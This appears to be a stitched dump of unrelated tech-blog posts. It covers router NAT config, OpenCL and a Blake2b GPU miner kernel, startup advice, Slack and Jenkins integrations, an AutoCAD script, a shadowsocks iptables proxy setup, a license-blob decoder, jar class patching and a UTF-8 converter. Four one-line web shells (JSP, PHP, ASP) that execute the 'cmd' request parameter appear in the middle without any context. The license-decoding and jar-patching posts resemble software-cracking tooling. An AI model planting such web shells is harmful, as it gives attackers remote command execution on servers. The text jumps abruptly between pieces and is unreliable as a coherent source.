inside-address {
address 192.168.1.13
port 47300-47310
}
log disable
protocol tcp_udp
type destination
}
rule 4 {
description 14
destination {
port 47400-47410
}
inbound-interface pppoe0
inside-address {
address 192.168.1.14
port 47400-47410
}
log disable
protocol tcp_udp
type destination
}
rule 5 {
description 15
destination {
port 47500-47510
}
inbound-interface pppoe0
inside-address {
address 192.168.1.15
port 47500-47510
}
log disable
protocol tcp_udp
type destination
}
rule 6 {
description 16
destination {
port 47600-47610
}
inbound-interface pppoe0
inside-address {
address 192.168.1.16
port 47600-47610
}
log disable
protocol tcp_udp
type destination
}
rule 7 {
description 11
destination {
port 47900-47910
}
inbound-interface pppoe0
inside-address {
address 192.168.1.11
port 47900-47910
}
log disable
protocol tcp_udp
type destination
}
rule 8 {
description 12
destination {
port 47800-47810
}
inbound-interface pppoe0
inside-address {
address 192.168.1.12
port 47800-47810
}
log disable
protocol tcp_udp
type destination
}
rule 9 {
description 13
destination {
port 47300-47310
}
inbound-interface pppoe1
inside-address {
address 192.168.1.13
port 47300-47310
}
log disable
protocol tcp_udp
type destination
}
rule 10 {
description 14
destination {
port 47400-47410
}
inbound-interface pppoe1
inside-address {
address 192.168.1.14
port 47400-47410
}
log disable
protocol tcp_udp
type destination
}
rule 11 {
description 15
destination {
port 47500-47510
}
inbound-interface pppoe1
inside-address {
address 192.168.1.15
port 47500-47510
}
log disable
protocol tcp_udp
type destination
}
rule 12 {
description 16
destination {
port 47600-47610
}
inbound-interface pppoe1
inside-address {
address 192.168.1.16
port 47600-47610
}
log disable
protocol tcp_udp
type destination
}
rule 5000 {
description "masquerade for WAN 0"
log disable
outbound-interface pppoe0
protocol all
source {
}
type masquerade
}
rule 5002 {
description "masquerade for WAN 1"
log disable
outbound-interface pppoe1
protocol all
source {
}
type masquerade
}
}
ssh {
port 22
protocol-version v2
}
ubnt-discover {
disable
}
unms {
disable
}
}
system {
conntrack {
expect-table-size 4096
hash-size 4096
modules {
sip {
disable
}
}
table-size 32768
tcp {
half-open-connections 512
loose enable
max-retrans 3
}
}
host-name ubnt
ipv6 {
disable
}
login {
user ubnt {
authentication {
encrypted-password ****
plaintext-password ""
}
level admin
}
}
name-server 114.114.114.114
name-server 114.114.115.115
name-server 119.29.29.29
name-server 223.5.5.5
offload {
hwnat enable
}
syslog {
global {
facility all {
level notice
}
facility protocols {
level debug
}
}
}
time-zone Asia/Singapore
}
/* Warning: Do not remove the following line. */
/* === vyatta-config-version: "config-management@1:conntrack@1:cron@1:dhcp-relay@1:dhcp-server@4:firewall@5:ipsec@5:nat@3:qos@1:quagga@2:suspend@1:system@4:ubnt-pptp@1:ubnt-udapi-server@1:ubnt-unms@1:ubnt-util@1:vrrp@1:vyatta-netflow@1:webgui@1:webproxy@1:zone-policy@1" === */
/* Release version: v2.0.8.5247496.191120.1124 */
The kernel is written in OpenCL C, a language based on C that includes many built-in math and vector functions. The kernel that performs the vector addition is defined below.
__kernel void vector_add(__global const int *A, __global const int *B, __global int *C) {
    // Get the index of the current element to be processed
    int i = get_global_id(0);

    // Do the operation
    C[i] = A[i] + B[i];
}
The host program controls the execution of kernels on the computing devices. The host program is written in C, but bindings for other languages like C++ and Python exist. The OpenCL API is defined in the CL/cl.h header file (OpenCL/opencl.h on Apple platforms). Below is the code for the host program that executes the kernel above on a computing device. I will not go into detail on each step, as this is supposed to be an introductory article.
#include <stdio.h>
#include <stdlib.h>

#ifdef __APPLE__
#include <OpenCL/opencl.h>
#else
#include <CL/cl.h>
#endif

#define MAX_SOURCE_SIZE (0x100000)

int main(void) {
    // Create the two input vectors
    int i;
    const int LIST_SIZE = 1024;
    int *A = (int*)malloc(sizeof(int)*LIST_SIZE);
    int *B = (int*)malloc(sizeof(int)*LIST_SIZE);
    for(i = 0; i < LIST_SIZE; i++) {
        A[i] = i;
        B[i] = LIST_SIZE - i;
    }

    // Load the kernel source code into the array source_str
    FILE *fp;
    char *source_str;
    size_t source_size;

    fp = fopen("vector_add_kernel.cl", "r");
    if (!fp) {
        fprintf(stderr, "Failed to load kernel.\n");
        exit(1);
    }
    source_str = (char*)malloc(MAX_SOURCE_SIZE);
    source_size = fread(source_str, 1, MAX_SOURCE_SIZE, fp);
    fclose(fp);

    // Get platform and device information
    cl_platform_id platform_id = NULL;
    cl_device_id device_id = NULL;
    cl_uint ret_num_devices;
    cl_uint ret_num_platforms;
    cl_int ret = clGetPlatformIDs(1, &platform_id, &ret_num_platforms);
    ret = clGetDeviceIDs(platform_id, CL_DEVICE_TYPE_DEFAULT, 1,
            &device_id, &ret_num_devices);

    // Create an OpenCL context
    cl_context context = clCreateContext(NULL, 1, &device_id, NULL, NULL, &ret);

    // Create a command queue
    cl_command_queue command_queue = clCreateCommandQueue(context, device_id, 0, &ret);

    // Create memory buffers on the device for each vector
    cl_mem a_mem_obj = clCreateBuffer(context, CL_MEM_READ_ONLY,
            LIST_SIZE * sizeof(int), NULL, &ret);
    cl_mem b_mem_obj = clCreateBuffer(context, CL_MEM_READ_ONLY,
            LIST_SIZE * sizeof(int), NULL, &ret);
    cl_mem c_mem_obj = clCreateBuffer(context, CL_MEM_WRITE_ONLY,
            LIST_SIZE * sizeof(int), NULL, &ret);

    // Copy the lists A and B to their respective memory buffers
    ret = clEnqueueWriteBuffer(command_queue, a_mem_obj, CL_TRUE, 0,
            LIST_SIZE * sizeof(int), A, 0, NULL, NULL);
    ret = clEnqueueWriteBuffer(command_queue, b_mem_obj, CL_TRUE, 0,
            LIST_SIZE * sizeof(int), B, 0, NULL, NULL);

    // Create a program from the kernel source
    cl_program program = clCreateProgramWithSource(context, 1,
            (const char **)&source_str, (const size_t *)&source_size, &ret);

    // Build the program
    ret = clBuildProgram(program, 1, &device_id, NULL, NULL, NULL);

    // Create the OpenCL kernel
    cl_kernel kernel = clCreateKernel(program, "vector_add", &ret);

    // Set the arguments of the kernel
    ret = clSetKernelArg(kernel, 0, sizeof(cl_mem), (void *)&a_mem_obj);
    ret = clSetKernelArg(kernel, 1, sizeof(cl_mem), (void *)&b_mem_obj);
    ret = clSetKernelArg(kernel, 2, sizeof(cl_mem), (void *)&c_mem_obj);

    // Execute the OpenCL kernel on the list
    size_t global_item_size = LIST_SIZE; // Process the entire lists
    size_t local_item_size = 64; // Divide work items into groups of 64
    ret = clEnqueueNDRangeKernel(command_queue, kernel, 1, NULL,
            &global_item_size, &local_item_size, 0, NULL, NULL);

    // Read the memory buffer C on the device to the local variable C
    int *C = (int*)malloc(sizeof(int)*LIST_SIZE);
    ret = clEnqueueReadBuffer(command_queue, c_mem_obj, CL_TRUE, 0,
            LIST_SIZE * sizeof(int), C, 0, NULL, NULL);

    // Display the result to the screen
    for(i = 0; i < LIST_SIZE; i++)
        printf("%d + %d = %d\n", A[i], B[i], C[i]);

    // Clean up
    ret = clFlush(command_queue);
    ret = clFinish(command_queue);
    ret = clReleaseKernel(kernel);
    ret = clReleaseProgram(program);
    ret = clReleaseMemObject(a_mem_obj);
    ret = clReleaseMemObject(b_mem_obj);
    ret = clReleaseMemObject(c_mem_obj);
    ret = clReleaseCommandQueue(command_queue);
    ret = clReleaseContext(context);
    free(A);
    free(B);
    free(C);
    return 0;
}
You can also refer to https://www.eriksmistad.no/getting-started-with-opencl-and-gpu-computing/ for a more detailed getting-started guide; the above code is from that article.
The easiest way to build it is to create a Makefile, so we don't need to remember the libraries and compiler flags.
ifeq ($(shell uname -s),Darwin)
CC ?= clang
LDLIBS += -lcurl -framework OpenCL
else
CC ?= gcc
LDLIBS += -lOpenCL -lcurl
endif

CFLAGS += -c -std=c11 -Wall -pedantic -O2
TARGET = vector-addition
SOURCES = vector-addition.c
OBJECTS = $(patsubst %.c,%.o,$(SOURCES))

all: $(TARGET)

%.o: %.c
	$(CC) $(CFLAGS) -o $@ $<

$(TARGET): $(OBJECTS)
	$(CC) -o $@ $^ $(LDLIBS)

clean:
	rm -f $(TARGET) $(OBJECTS)

.PHONY: all clean
Writing a GPU miner with OpenCL is now straightforward, as all we need to do is implement the hashing algorithm. As an example, here is a GPU miner kernel for Blake2b (from https://github.com/NebulousLabs/Sia-GPU-Miner/blob/master/sia-gpu-miner.cl):
static inline ulong rotr64( __const ulong w, __const unsigned c ) { return ( w >> c ) | ( w << ( 64 - c ) ); }
__constant static const uchar blake2b_sigma[12][16] = {
{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } ,
{ 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 } ,
{ 11, 8, 12, 0, 5, 2, 15, 13, 10, 14, 3, 6, 7, 1, 9, 4 } ,
{ 7, 9, 3, 1, 13, 12, 11, 14, 2, 6, 5, 10, 4, 0, 15, 8 } ,
{ 9, 0, 5, 7, 2, 4, 10, 15, 14, 1, 11, 12, 6, 8, 3, 13 } ,
{ 2, 12, 6, 10, 0, 11, 8, 3, 4, 13, 7, 5, 15, 14, 1, 9 } ,
{ 12, 5, 1, 15, 14, 13, 4, 10, 0, 7, 6, 3, 9, 2, 8, 11 } ,
{ 13, 11, 7, 14, 12, 1, 3, 9, 5, 0, 15, 4, 8, 6, 2, 10 } ,
{ 6, 15, 14, 9, 11, 3, 0, 8, 12, 2, 13, 7, 1, 4, 10, 5 } ,
{ 10, 2, 8, 4, 7, 6, 1, 5, 15, 11, 9, 14, 3, 12, 13, 0 } ,
{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } ,
{ 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 } };
// Target is passed in via headerIn[4] (header bytes 32-39)
__kernel void nonceGrind(__global ulong *headerIn, __global ulong *nonceOut) {
ulong target = headerIn[4];
ulong m[16] = { headerIn[0], headerIn[1],
headerIn[2], headerIn[3],
(ulong)get_global_id(0), headerIn[5],
headerIn[6], headerIn[7],
headerIn[8], headerIn[9], 0, 0, 0, 0, 0, 0 };
ulong v[16] = { 0x6a09e667f2bdc928, 0xbb67ae8584caa73b, 0x3c6ef372fe94f82b, 0xa54ff53a5f1d36f1,
0x510e527fade682d1, 0x9b05688c2b3e6c1f, 0x1f83d9abfb41bd6b, 0x5be0cd19137e2179,
0x6a09e667f3bcc908, 0xbb67ae8584caa73b, 0x3c6ef372fe94f82b, 0xa54ff53a5f1d36f1,
0x510e527fade68281, 0x9b05688c2b3e6c1f, 0xe07c265404be4294, 0x5be0cd19137e2179 };
#define G(r,i,a,b,c,d) \
a = a + b + m[blake2b_sigma[r][2*i]]; \
d = rotr64(d ^ a, 32); \
c = c + d; \
b = rotr64(b ^ c, 24); \
a = a + b + m[blake2b_sigma[r][2*i+1]]; \
d = rotr64(d ^ a, 16); \
c = c + d; \
b = rotr64(b ^ c, 63);
#define ROUND(r) \
G(r,0,v[ 0],v[ 4],v[ 8],v[12]); \
G(r,1,v[ 1],v[ 5],v[ 9],v[13]); \
G(r,2,v[ 2],v[ 6],v[10],v[14]); \
G(r,3,v[ 3],v[ 7],v[11],v[15]); \
G(r,4,v[ 0],v[ 5],v[10],v[15]); \
G(r,5,v[ 1],v[ 6],v[11],v[12]); \
G(r,6,v[ 2],v[ 7],v[ 8],v[13]); \
G(r,7,v[ 3],v[ 4],v[ 9],v[14]);
ROUND( 0 );
ROUND( 1 );
ROUND( 2 );
ROUND( 3 );
ROUND( 4 );
ROUND( 5 );
ROUND( 6 );
ROUND( 7 );
ROUND( 8 );
ROUND( 9 );
ROUND( 10 );
ROUND( 11 );
#undef G
#undef ROUND
if (as_ulong(as_uchar8(0x6a09e667f2bdc928 ^ v[0] ^ v[8]).s76543210) < target) {
*nonceOut = m[4];
return;
}
}
Please note that after Bitmain released the Antminer A3 ASIC for the Blake2b algorithm (https://www.bitsonline.com/review-antminer-a3-blake-2b-asic-miner/), it is no longer profitable to mine Blake2b coins with a GPU. The code here is only for learning how a GPU miner works.
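To see what the kernel computes, here is a CPU sketch of the same nonce-grinding loop in Python. The layout (the nonce replacing header bytes 32-39, and the first eight digest bytes compared big-endian against the target) follows my reading of the kernel above; this is an illustration, not a drop-in miner:

```python
import hashlib

def grind(header80: bytes, target: int, start: int = 0, rounds: int = 1000):
    """Try successive nonces in bytes 32-39 of an 80-byte header until the
    big-endian value of the first 8 digest bytes is below target."""
    for nonce in range(start, start + rounds):
        h = bytearray(header80)
        h[32:40] = nonce.to_bytes(8, "little")  # nonce occupies m[4] in the kernel
        digest = hashlib.blake2b(bytes(h), digest_size=32).digest()
        if int.from_bytes(digest[:8], "big") < target:
            return nonce
    return None
```

The GPU kernel does exactly this, but evaluates one nonce per work item instead of looping.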
Blake2: https://blake2.net/blake2.pdf
Even if we count Simplified Chinese and Traditional Chinese as one language, we still have eight languages that are widely used in Southeast Asia.
It feels so different to be in such a diverse environment. It's common for people not to understand each other, and the one thing we need is tolerance. When someone says something that seems so untrue to you, that doesn't mean he or she is wrong. The first thing to do is not to deny it but to listen thoroughly and work out the reasoning behind it. Most times I find it's not about right or wrong; it's about different perspectives on the same problem.
To be finished.
Which operating system, Windows, Linux or OS X, do you use as your default development environment? Which operating system do you use in production: Debian-based, Red Hat-based, or Gentoo? Which cloud provider do you use, AWS or another? Which language do you use as the main backend language: Python, Ruby, Node.js, Java, PHP, or C++? Which infrastructure do you use?
All those questions can have multiple answers, and what you choose shows what you believe. For some questions there exists a best answer, but it is only the best answer for most people; some still believe in the alternatives and have their reasons.
We humans are so small and weak that we don't even know where we come from or why we exist. We cannot prove the existence of God, and at the same time we cannot prove that God does not exist. We just believe. We just prefer.
In my personal opinion, the best setup for a startup technical team is:
There are still so many choices you need to make. Every choice you make creates a parallel universe and thus makes you different from everyone else.
Actually, Slack is more than just a communication tool. What makes it extraordinary is that it makes it possible to integrate everything and complete your workflow. In this post we're highlighting some of the most useful new workflows that Slack enables. All of these are currently heavily in use in our team, and we find them exceptionally helpful.
The Jira integration posts messages whenever a task or bug changes its status: for instance, task created, or task moved to Confirmed, In Progress, Resolved, Verified, etc.
To integrate Jira, add the Jira app to your Slack with multiple configurations, one configuration per channel. Configure the Status Changes to `* -> *` and copy the Webhook URL. On Jira, click Admin > System > WebHooks and create multiple webhooks, one webhook per channel. For each webhook, you can specify a JQL query to send only events triggered by matching issues. Paste the Webhook URL into the URL field and check all the checkboxes under Issue.
You may configure another channel just for QA. For this configuration, constrain the Status Changes to `* -> Resolved`. That's because in our projects we use a Bugzilla-style workflow: tasks moved to Resolved are ready for QA to test. Of course, it's better to create a dedicated channel on Slack just for QA.
The Slack app above tracks only task status changes. If someone comments on a task, Slack will not be notified, because the current Jira app for Slack doesn't support comments. I believe it will still take some time before this feature is available. To work around it, we need Hubot.
Follow this link to install hubot-jira-comment: https://github.com/mnpk/hubot-jira-comment.
Hubot can do much more than that. Don’t forget, it’s a robot.
The Bitbucket integration posts messages about all commits, pull requests, comments and issues. The messages include links to the events on Bitbucket.
Once configured, Jenkins sends messages about failed and successful builds to your Slack channel. Your whole team can easily get notified and stay informed of any change in your build.
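Under the hood, most of these integrations simply POST a JSON payload to a Slack incoming webhook. A minimal sketch in Python (the webhook URL below is a placeholder; a real one comes from Slack's Incoming WebHooks configuration page, and the message text here is purely illustrative):

```python
import json
from urllib import request

# Placeholder: substitute the URL generated by Slack's Incoming WebHooks page.
HOOK_URL = "https://hooks.slack.com/services/T000/B000/XXXXXXXX"

def build_payload(job, status, url):
    # Incoming webhooks accept a JSON body with a "text" field;
    # *bold* and <url|label> are Slack message formatting.
    return json.dumps({"text": f"Build *{job}*: {status} (<{url}|details>)"})

def notify(job, status, url):
    req = request.Request(
        HOOK_URL,
        data=build_payload(job, status, url).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    return request.urlopen(req)
```

This is essentially what the Jenkins plugin does for you on every build result.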
Tools like Sentry report on exceptions and log errors that happen in your application. After adding the appropriate code and build changes, these tools get access to your errors, aggregate them, and report high-level stats.
Get notified when errors happen.
One of the most frequently asked questions in my team is where we are going for lunch today. With Lunchbox, we can easily propose some places for lunch and vote.
It can turn any sentence into a gif.
Chinese text shows as question marks (?) when opening a file in AutoCAD, instead of the actual characters.
Often this is caused by a missing font file (.shx). I did have this problem, so I searched and found the missing font, called HZTXT.shx, and put it under the shx folder. However, this only solved part of the problem, and some Chinese text still showed as question marks (?).
Another cause is TEXT objects, which cannot support multiple languages. Within the Chinese version of Windows, the one and only language is Chinese, so on that platform a TEXT object displays the proper characters. When the file is opened on a non-Chinese operating system, the limitation is encountered: even when there is more than one language on the Windows operating system, the TEXT object is still bound to a single language.
MTEXT objects are able to support multiple languages, so you will want to use the TXT2MTXT command (Express Tools) to convert the TEXT objects to MTEXT objects. If the TEXT objects are within a block, first enter the BLOCK EDITOR and then use the TXT2MTXT command.
;changes text to individual mtext by Carl B.
(princ "\nType T2M to start")
(defun c:t2m ()
  (setq Tset (ssget '((0 . "*TEXT")))) ;filter TEXT in selection set
  (setq Setlen (sslength Tset)         ;number of entities in selection set
        Count  0                       ;initialize the counter
  ) ;setq
  (repeat SetLen                       ;repeat SetLen times
    (setq Ename (ssname Tset Count))   ;Ename is the Count-th entity in Tset
    (command "_txt2mtxt" Ename "")
    (setq Count (+ 1 Count))           ;add 1 to Count(er)
  ) ;repeat
  (princ)
)
Copy the above code and paste it into a file named t2m.lsp.
Add this file to the Startup Suite.
Now you can use the T2M command to convert multiple TEXT objects to individual MTEXT objects.
I'm going to discuss this from nine angles. They are not all ordered by importance, even though some are.
The most important thing is being aware of the big picture, i.e. the goal of the company, the current progress, and how many steps it's going to take. Always focus on the most important things. Resources are limited; whether you make a big difference depends on how you use those limited resources to resolve the most critical problems in a limited time.
For an internet technology startup, you need to know how many software engineers, designers and product managers to hire in the first stage, and in what order. Recruitment is hard for startups: the work is heavier while the salary is the same, and options can be offered, but if the company dies you get nothing. Everyone knows that. For a startup, trust among the first several members is essential, so the initial people are ideally friends of several years who know each other well enough that even when there are disagreements, you can work them out.
It's best if you can contact some old friends and pull them in. Friends of friends are good as well. Just remember not to bring in office politics; keep the work environment pure and simple.
For technical recruitment, you need to draft a hiring standard. For example, in my company I set up three interview steps, and a candidate needs to pass all three to join. The first is a problem-solving interview: there are four problems, and candidates can choose any one to solve in any language. This tests basic coding knowledge and algorithm skills. The second is resume screening and HR-related questions. In the third, I ask face-to-face questions about work experience and other topics for a capability assessment.
There is no IT department in a startup, at least at the beginning, so you need to set up the office network and choose routers, switches, APs, etc. You have to consider a lot of aspects. For example, I expected about 20 staff in the first year, so I chose two Netgear WNDR4300s, one as the main router and the other as a wireless AP, instead of more expensive Cisco gear. After flashing OpenWrt onto the routers, their performance has been great so far.
What kind of computers should people use? Not so important? Actually, it's not as unimportant as it seems: people with good equipment can enormously increase productivity. In my company, I chose the 27-inch iMac with Retina 5K display for designers, and a 2.6GHz Mac mini with two separate displays for engineers. The 2.6GHz model without an SSD? Well, I swapped the hard disk for an SSD myself to save money, and it's cool! Of course, I had to buy two screwdrivers (T6 and T9) and the warranty is void, but it's really cool. Right on.
It's always good to use a dynamic language like Python or Ruby as the main server language for a startup. The advantages are obvious; just think about how much time you save, and time is one of the critical parameters that decides whether a startup grows. Does it make recruitment harder? Never mind, qualified engineers can learn. From my experience, it's worth it. That's also why you need a hiring standard: HR only knows how to hire a PHP guy, an Android guy or a Java guy, or maybe someone with 2 or 5 years of experience. They will never know that the job should not be done that way. Separating engineers by language is stupid. That's why I propose several algorithm quizzes and tell HR that regardless of whether a candidate is a fresh graduate, or whether she knows Node or JavaScript, solving one of the four algorithm problems is all it takes to proceed to the onsite interview.
I have used all kinds of languages since primary school: QBasic, C, Visual Basic, Pascal, assembly, C++, and then Java, PHP, Objective-C, Python and Node. I believe I have learned more languages than most engineers, but there are hundreds of languages out there, so I'm not going to show off. It's just that I have a reason to choose Python for the current startup after comparing all the languages I know.
For a startup, it's common to ask questions like: do we need to develop a native app? Do we need to use cloud servers? The second question is easier to answer: in most cases, if you are not dealing with sensitive data, you should use cloud servers because it saves time. Which cloud provider? The best one, which for now is Amazon's AWS. The first question is a little trickier. There are cross-platform solutions for developing Android and iOS apps at the same time, but if the budget is not too tight and time allows, I would advise developing native apps.
SCRUM is awesome, especially for a startup. Many big companies are striving to move to SCRUM. A startup is a brand-new company, so why not use SCRUM from the very beginning? I can't think of a reason not to.
To run SCRUM, we need a series of tools: Jira for task management, Jenkins for continuous integration, and GitHub for code management. I also set up a wiki for storing knowledge and product summaries. All these systems are linked together. Besides that, we need to set up rules and get people to follow them so SCRUM runs smoothly.
As for task assignment, it's best done before a sprint starts: get the story points by discussing with product managers, get the time estimates by discussing with engineers, then reorder tasks by priority and assign each one to the right person. Normally, once a sprint starts, the scope should not change.
You need to balance different engineers' interests, pressure and expertise. Track the burndown chart during the whole sprint, and resolve any obstacles you find. One thing never changes: quality is the most important, while scope and schedule are not, even though those two are also very important.
You need to understand the product from a product perspective even though you are not a product manager. It helps when you argue with product managers who think your cost estimate for a feature is wrong. Just joking. Actually, it's more than that: you are in a team, and everyone should be able to see things from each other's perspective. Only in this way can you help get the priority list right.
You should always trust professional people to do professional work, and you should always trust your coworkers. However, you must have good aesthetic taste, otherwise you may disagree with designers' work for the wrong reasons. Try to be humble and learn from designers.
Every month or two, there should be a team-building event. Just go climbing or swimming, or do anything cool as a team. You will find out many things about your colleagues you didn't know before, and make some unexpected discoveries.
For newly joined engineers, you have the responsibility to guide them and, if they need it, point out a clear way to grow.
A tech-sharing meeting is a good way to learn technologies fast and get to know the engineers at the same time. You should hold it periodically.
Finally, as a tech lead, you should also take on some development and operations tasks. Your code should set the standard for other engineers. Talk is cheap, show me your code. So show your code to others.
If you are using a TV that supports AirPlay, you can simply AirPlay your iPhone screen onto your TV.
iptables.
The easiest way I found in my recent research is shadowsocks-libev. Shadowsocks-libev is a lightweight secured SOCKS5 proxy for embedded devices and low-end boxes. It is written in pure C and only depends on libev and OpenSSL or PolarSSL. Support for mbedTLS has been added but is still experimental, and it is not officially supported yet.
Note that the original shadowsocks doesn't support ss-redir, and shadowsocks-libev seems to be the only port that does. ss-redir differs from ss-local in that it handles transparently redirected TCP traffic rather than speaking the SOCKS protocol.
git clone https://github.com/leonsim/shadowsocks-libev.git
cd shadowsocks-libev
./configure && make
sudo make install
# Create new chain
iptables -t nat -N SHADOWSOCKS
iptables -t mangle -N SHADOWSOCKS
# Ignore your shadowsocks server's addresses
# It's very IMPORTANT, just be careful.
# Note 123.123.123.123 is the same as the remote server in /etc/config/shadowsocks.json
iptables -t nat -A SHADOWSOCKS -d 123.123.123.123 -j RETURN
# Ignore LANs and any other addresses you'd like to bypass the proxy
# See Wikipedia and RFC5735 for full list of reserved networks.
# See ashi009/bestroutetb for a highly optimized CHN route list.
iptables -t nat -A SHADOWSOCKS -d 0.0.0.0/8 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 10.0.0.0/8 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 127.0.0.0/8 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 169.254.0.0/16 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 172.16.0.0/12 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 192.168.0.0/16 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 224.0.0.0/4 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 240.0.0.0/4 -j RETURN
# Anything else should be redirected to shadowsocks's local port
iptables -t nat -A SHADOWSOCKS -p tcp -j REDIRECT --to-ports 12345
# Add any UDP rules
ip rule add fwmark 0x01/0x01 table 100
ip route add local 0.0.0.0/0 dev lo table 100
iptables -t mangle -A SHADOWSOCKS -p udp --dport 53 -j TPROXY --on-port 12345 --tproxy-mark 0x01/0x01
# Apply the rules
iptables -t nat -A PREROUTING -p tcp -j SHADOWSOCKS
iptables -t mangle -A PREROUTING -j SHADOWSOCKS
# Start the shadowsocks-redir
ss-redir -u -c /etc/config/shadowsocks.json -f /var/run/shadowsocks.pid
If UDP doesn't work, just skip the UDP part and use only the TCP rules.
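To sanity-check which destinations the SHADOWSOCKS chain redirects, the RETURN/REDIRECT decision can be modeled in Python with the standard ipaddress module (123.123.123.123 stands in for your real server address, as in the rules above):

```python
import ipaddress

# The shadowsocks server itself must bypass the proxy, or traffic loops.
SERVER = ipaddress.ip_address("123.123.123.123")

# Reserved networks that the chain RETURNs (see RFC5735).
RESERVED = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4")]

def should_redirect(ip: str) -> bool:
    """Mirror the nat-table logic: False means RETURN (bypass),
    True means REDIRECT to ss-redir's local port."""
    addr = ipaddress.ip_address(ip)
    if addr == SERVER:
        return False
    return not any(addr in net for net in RESERVED)
```

Anything that returns True here would be redirected to port 12345 by the last nat rule.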
Although shadowsocks-libev can handle thousands of concurrent connections nicely, we still recommend setting up your server’s firewall rules to limit connections from each user:
# Up to 32 connections are enough for normal usage
iptables -A INPUT -p tcp --syn --dport ${SHADOWSOCKS_PORT} -m connlimit --connlimit-above 32 -j REJECT --reject-with tcp-reset
This plugin allows for throttling the number of concurrent builds of a project running per node or globally.
This plugin integrates management of keychain and provisioning files for iOS and OSX projects.
PostBuildScript makes it possible to execute a set of scripts at the end of the build.
This plugin enables use of Atlassian Crowd as an authentication source. It uses Crowd’s REST API (available since Crowd 2.1) to access the services and supports single-sign-on.
This plugin integrates Jenkins to Atlassian JIRA.
This plugin notifies a Stash server of build results.
This plugin polls Atlassian Stash to determine whether there are Pull Requests that should be built.
This plugin parses Android Lint analysis results and visualises the issues found.
Starts an Android emulator with given properties before a build, then shuts it down after.
To better understand the relationship between the original text and the license text, I wrote a Python script to recover the original text from a license text.
import zlib
import base64

def get_original_text(license):
    license = ''.join(license.split())
    i = license.rfind('X')
    l = int(license[i + 3:], 31)
    license = license[:l]
    s = base64.b64decode(license)
    l = ord(s[:4].decode('UTF-32BE'))
    text, signature = s[4:4 + l], s[4 + l:]
    ans = zlib.decompress(text[5:])
    return ans.decode('utf-8')

license = '''
AAABJA.......
'''
print(get_original_text(license))
.class file in a .jar file.
After searching Google and Stack Overflow for a while, I found this question gets little attention, and almost all the information out there is incomplete.
So I wrapped it up and made the whole process runnable.
Use Luyten (or JD-GUI, if you don't mind its bugs) to decompile the jar, and save all files to a folder srcdir.
Modify a Java file, then compile it to a .class file:
cd srcdir
vi com/.../A.java
cp some_folder/original.jar ./
javac -cp "original.jar" com/.../A.java
The last command will generate a file named A.class in the same folder as A.java. Use Luyten to check whether A.class is modified.
jar -uf original.jar com/.../A.class
mv original.jar modified.jar
This will generate a modified.jar. Use Luyten to check again that it's modified.
Note: if A.java depends on external jars other than original.jar, add them to the classpath:
javac -cp "original.jar;lib/*" com/.../A.java
It's important to use lib/* rather than lib/*.jar, because the latter will not work.
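The repacking step can also be scripted. A jar is just a zip archive, so a small Python sketch using the standard-library zipfile module can swap one entry (the member path below is illustrative):

```python
import zipfile

def replace_in_jar(jar_path, out_path, member, new_bytes):
    """Copy every entry of jar_path into out_path, substituting new_bytes
    for the entry named member (e.g. 'com/example/A.class')."""
    with zipfile.ZipFile(jar_path) as src, \
         zipfile.ZipFile(out_path, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = new_bytes if info.filename == member else src.read(info.filename)
            dst.writestr(info, data)  # reuse the original ZipInfo metadata
```

This is equivalent to the `jar -uf` step, but leaves the original jar untouched.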
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
<?php echo passthru($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<% eval request("cmd") %>
I wrapped all this into a Python egg package and uploaded it to PyPI, so anyone who wants to use it no longer needs to copy and paste code. Just install it and use it.
pip install toutf8
This ships with a shell command, so after installing, just type
toutf8 FILENAME
to transform a single file to UTF-8 encoding, or
toutf8 PATHNAME
to transform all files in folder PATHNAME to UTF-8 encoding.
The script can detect the source encoding, so whether it is GBK, GB2312, GB18030, CP936 or Shift-JIS, everything will be transformed to UTF-8.
GBK --> UTF-8
GB2312 --> UTF-8
GB18030 --> UTF-8
CP936 --> UTF-8
Shift-jis --> UTF-8
Euc-jp --> UTF-8
Korean --> UTF-8
Vietnamese --> UTF-8
UTF-16LE --> UTF-8
UTF-16BE --> UTF-8
UTF-32 --> UTF-8
Use a regular expression to filter out which kinds of files should be transformed.
toutf8 PATHNAME .*txt
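The detection step can be approximated with a naive try-in-order sketch. This is not the real toutf8 implementation (which presumably uses a proper detector); the candidate list and function name below are illustrative assumptions.

```python
import pathlib

# Illustrative subset of encodings, tried in order. Note that gb18030
# accepts almost any byte string, so the order of candidates matters.
CANDIDATES = ["utf-8", "gb18030", "shift_jis", "euc_jp", "utf-16"]

def to_utf8(path):
    """Rewrite the file at `path` in place as UTF-8, guessing its encoding."""
    raw = pathlib.Path(path).read_bytes()
    for enc in CANDIDATES:
        try:
            text = raw.decode(enc)
            break
        except UnicodeDecodeError:
            continue
    else:
        raise ValueError("cannot detect encoding of %s" % path)
    pathlib.Path(path).write_text(text, encoding="utf-8")
```

A real tool would use statistical detection (e.g. a chardet-style library) instead of a fixed trial order, since many legacy encodings will happily decode each other’s bytes into mojibake.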
The biggest possible area of the cake is \(16 \times 10 \times 10 = 1600\), so the biggest possible side of the cake is \(40\).
Imagine the cake as a matrix with rows and columns, where each element of the matrix is a 1x1 cell. The problem then translates to whether there exists a way to fill this matrix with the given squares.
Now fill the matrix in this order: find the lowest, leftmost empty cell \(C_{i,j}\), then find the successive cells \(C_{i,j}, C_{i, j+1}, \dots, C_{i, j+w}\) at the same height as \(C_{i,j}\).
